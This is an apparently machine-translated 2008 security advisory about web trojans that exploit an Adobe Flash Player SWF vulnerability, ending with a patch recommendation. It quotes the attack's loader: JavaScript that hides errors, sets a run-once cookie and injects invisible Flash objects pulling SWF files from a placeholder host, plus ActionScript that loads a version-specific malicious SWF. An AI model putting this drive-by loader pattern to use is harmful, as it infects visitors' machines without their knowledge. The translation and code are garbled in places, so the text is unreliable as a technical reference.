FLASH net horse quietly coming out of the Internet-vulnerability warning-the black bar safety net

2008-05-27T00:00:00
ID MYHACK58:62200819168
Type myhack58
Reporter 佚名
Modified 2008-05-27T00:00:00

Description

ps:it is recommended that everyone upgrade as soon as possible flash plug-in.

In recent days the interception to the use of the Adobe Flash Player SWF file vulnerability network horses, the net horse through the page loading a normal FLASH file, then in the FLASH file calls the embedded construct a malicious FLASH file, this will cause an overflow, potentially executing arbitrary instructions. The following to call the page content:

<script> window. onerror=function(){return true;} function init(){window. status=”";}window. onload = init; if(document. cookie. indexOf(”play=”)==-1){ var expires=new Date(); expires. setTime(expires. getTime()+2 46 06 0*1 0 0 0); document. cookie=”play=Yes;path=/;expires=”+expires. toGMTString(); if(navigator. userAgent. toLowerCase(). indexOf(”msie”)>0) { document. write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-4 4 4 5 5 3 5 4 0 0 0 0" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,1 9,0" width="0" height="0" align="middle">'); document. write(’<param name=”allowScriptAccess” value=”sameDomain”/>’); document. write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’); document. write(’<param name=”quality” value=”high”/>’); document. write(’<param name=”bgcolor” value=”#ffffff”/>’); document. write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’); document. write(’</object>’); }else {document. write(”<EMBED src=http://www. XXX. cn/flash/XX. swf width=0 height=0>”);}} </script> the following is the normal FLASH file using the script:

// Action script...// [Action in Frame 1] var flashVersion =/hxversion; loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf. swf”, _root); stop();

The malicious FLASH part as follows: ! attachments/200805/27_091558_1.jpg Recommendations:

Vendor patch: Adobe

The current vendors have released an upgrade patch to fix this security issue, please go to the manufacturers homepage download: <http://www.adobe.com/go/getflash>

From:<http://www.scanw.com/>